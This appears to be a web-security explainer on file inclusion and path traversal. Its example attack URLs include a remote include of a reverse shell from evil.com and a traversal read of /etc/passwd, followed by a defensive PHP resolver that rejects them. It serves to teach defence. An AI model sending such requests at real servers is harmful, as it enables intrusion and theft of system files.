- Local File Inclusion (LFI)
Local File Inclusion (LFI) is a vulnerability that allows an attacker to make the web server include files that are already present on the server. This type of attack typically targets web applications that use file paths as input without proper validation. For example, a cybercriminal who has uploaded a file to the website can then execute it with a request like http://example.com/index.php?page=/uploads/malicious.php
- Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is a vulnerability that allows an attacker to include a remote file, usually through a web script. This file could be malicious, and the attacker can execute it on the server, gaining control over the server. The cybercriminal can build a reverse shell, upload it to their own website, and then access it with http://victim.com/index.php?page=http://evil.com/malicious.php.
- Path Traversal
Path traversal (also known as Directory Traversal) is a vulnerability that allows an attacker to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with ‘../’ sequences and similar variations, cybercriminals can traverse directories to access unauthorized files. The cybercriminal can access /etc/passwd by navigating up the directory tree with http://example.com/index.php?file=../../../../etc/passwd.
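
A server-side check that rejects all three request shapes described above (LFI, RFI and path traversal), as an added example that is not part of the original page. The function name resolve_page, the pages directory and the page name home are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example; resolve_page() and the pages directory are hypothetical names.
// It replaces the pattern of passing $_GET['page'] straight to include.

function resolve_page(string $name, string $baseDir): ?string
{
    // 1. Accept only a short identifier: no slashes, dots, schemes or NUL bytes.
    if (preg_match('/\A[a-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // 2. Canonicalise; realpath() returns false when the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must sit under the base directory,
    //    which also catches a symlink inside it that points elsewhere.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory with one legitimate page,
// then the request values from the three descriptions above.
$dir = sys_get_temp_dir() . '/pages_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';\n");

$requests = [
    'home',                           // legitimate page name
    '/uploads/malicious.php',         // LFI of an uploaded file
    'http://evil.com/malicious.php',  // RFI
    '../../../../etc/passwd',         // path traversal
];
foreach ($requests as $page) {
    $resolved = resolve_page($page, $dir);
    // In a real handler: include $resolved when non-null, otherwise send a 404.
    printf("%-32s => %s\n", $page, $resolved === null ? 'rejected' : 'allowed');
}
unlink($dir . '/home.php');
rmdir($dir);
```

Only the first request resolves; the other three fail the identifier check before any filesystem access happens. Keeping PHP's allow_url_include setting off is a separate control against RFI.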